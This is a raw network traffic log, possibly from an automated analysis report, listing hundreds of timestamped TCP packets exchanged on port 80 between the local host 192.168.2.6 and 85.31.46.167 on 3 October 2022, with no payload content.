Oct 3, 2022 17:42:36.944785118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944817066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944844961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944856882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944890022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944917917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944930077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944962978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944994926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945003033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945035934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945065975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945075989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945108891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945142031 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945149899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945182085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945214033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945223093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945255041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945286989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945296049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945327044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945358038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945368052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945399046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945430040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945440054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945472956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945504904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945518017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945549965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945581913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945590973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945622921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945658922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945663929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945696115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945739985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945739031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945774078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945811033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945816994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945849895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945888996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945892096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945924997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.945959091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.945966959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946000099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946034908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946042061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946074963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946115017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946116924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946155071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946197033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946222067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946228981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946259975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946263075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946263075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946293116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946325064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946365118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946394920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946398973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946429014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946429968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946463108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946497917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946506977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946540117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946572065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946579933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946613073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946644068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946652889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946686029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946715117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.946726084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.946966887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.950544119 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974026918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974072933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974104881 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974153996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974186897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974229097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974241972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974261999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974301100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974304914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974339008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974375010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974379063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974411964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974451065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974455118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974478006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974499941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974534035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974575043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974607944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974647045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974647045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974679947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974720001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974720955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974754095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974791050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974795103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974828005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974867105 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.974868059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974937916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.974981070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975013018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975028038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975028038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975045919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975089073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975121021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975159883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975193977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975203037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975203037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975224972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975275993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975308895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975339890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975361109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975372076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975410938 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975414991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975445986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975450993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975477934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975508928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975552082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975558043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975584030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975600958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975615978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975647926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975657940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975678921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975709915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975712061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975742102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975773096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975775957 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975805998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975836992 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975872993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975877047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975909948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975912094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.975940943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.975982904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976015091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976053953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976057053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976089954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976098061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976120949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976161957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976193905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976229906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976236105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976268053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976305008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976309061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976342916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976376057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976382971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976414919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976416111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976447105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976490021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976521015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976561069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976562977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976593018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976634026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976639032 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976665974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976681948 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976697922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976728916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976744890 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976761103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976790905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976810932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976821899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976855040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976866007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976886988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976918936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976946115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.976949930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976982117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.976991892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977014065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977044106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977051020 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977076054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977107048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977118969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977138996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977169991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977176905 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977201939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977233887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977246046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977264881 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977297068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977318048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977328062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977361917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977401972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977402925 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977432966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977474928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977478027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977507114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977530003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977539062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977570057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977583885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977601051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977632999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977648973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977665901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977698088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977711916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977730989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977762938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977768898 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977793932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977824926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977835894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977855921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977888107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977924109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977927923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977961063 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.977961063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.977993965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.978037119 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.983025074 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005247116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005290985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005378962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005412102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005444050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005491972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005526066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005567074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005573988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005573988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005601883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005645990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005649090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005683899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005702019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005729914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005745888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005779028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005781889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005811930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005834103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005834103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.005860090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005894899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005937099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.005969048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006011009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006042004 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006042957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006076097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006103039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006103039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006108999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006141901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006146908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006175995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006221056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006248951 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006262064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006289959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006298065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006331921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006372929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006372929 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006406069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006444931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006448030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006480932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006521940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006524086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006556988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006568909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006589890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006620884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006622076 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006654024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006696939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006699085 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006728888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006772041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006784916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006805897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006849051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006859064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006900072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006908894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006954908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.006977081 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.006987095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007019043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007029057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007051945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007093906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007126093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007133961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007158041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007189989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007232904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007240057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007265091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007306099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007308006 CEST	49711	80	192.168.2.6	85.31.46.167
